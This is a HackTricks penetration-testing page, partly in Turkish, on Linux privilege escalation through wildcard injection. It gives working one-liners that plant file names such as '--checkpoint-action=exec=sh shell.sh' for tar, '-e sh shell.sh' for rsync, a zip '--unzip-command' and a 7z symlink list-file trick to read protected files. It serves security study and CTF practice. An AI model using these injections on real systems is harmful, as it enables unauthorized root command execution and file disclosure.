hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md

4.9 KiB
Raw Permalink Blame History

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

chown, chmod

Hangi dosya sahibini ve izinlerini diğer dosyalar için kopyalamak istediğinizi belirtebilirsiniz.

touch "--reference=/my/own/path/filename"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack)
Daha fazla bilgi için https://www.exploit-db.com/papers/33930

Tar

Rasgele komutlar çalıştırın:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar saldırısı) kullanılarak istismar edilebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930 adresine bakın.

Rsync

Rasgele komutlar çalıştırın:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) kullanılarak istismar edilebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930 adresine bakın.

7z

7z içinde -- kullanarak *'dan önce (not: -- sonraki girdinin parametre olarak işlenemeyeceği anlamına gelir, bu durumda sadece dosya yolları) rastgele bir hatanın bir dosyayı okumasına neden olabilirsiniz, bu nedenle aşağıdaki gibi bir komut root tarafından çalıştırılıyorsa:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Ve bu işlemin gerçekleştirildiği klasörde dosyalar oluşturabilirsiniz, @root.txt dosyasını ve okumak istediğiniz dosyaya symlink olan root.txt dosyasını oluşturabilirsiniz:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Sonra, 7z çalıştırıldığında, root.txt dosyasını sıkıştırması gereken dosyaların listesini içeren bir dosya olarak ele alacaktır (bu, @root.txt varlığının gösterdiği şeydir) ve 7z root.txt dosyasını okuduğunda /file/you/want/to/read dosyasını okuyacak ve bu dosyanın içeriği bir dosya listesi olmadığından, bir hata verecektir içeriği göstererek.

HackTheBox'tan CTF kutusunun Yazılımlarında daha fazla bilgi.

Zip

Rasgele komutlar çalıştır:

zip name.zip files -T --unzip-command "sh -c whoami"

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}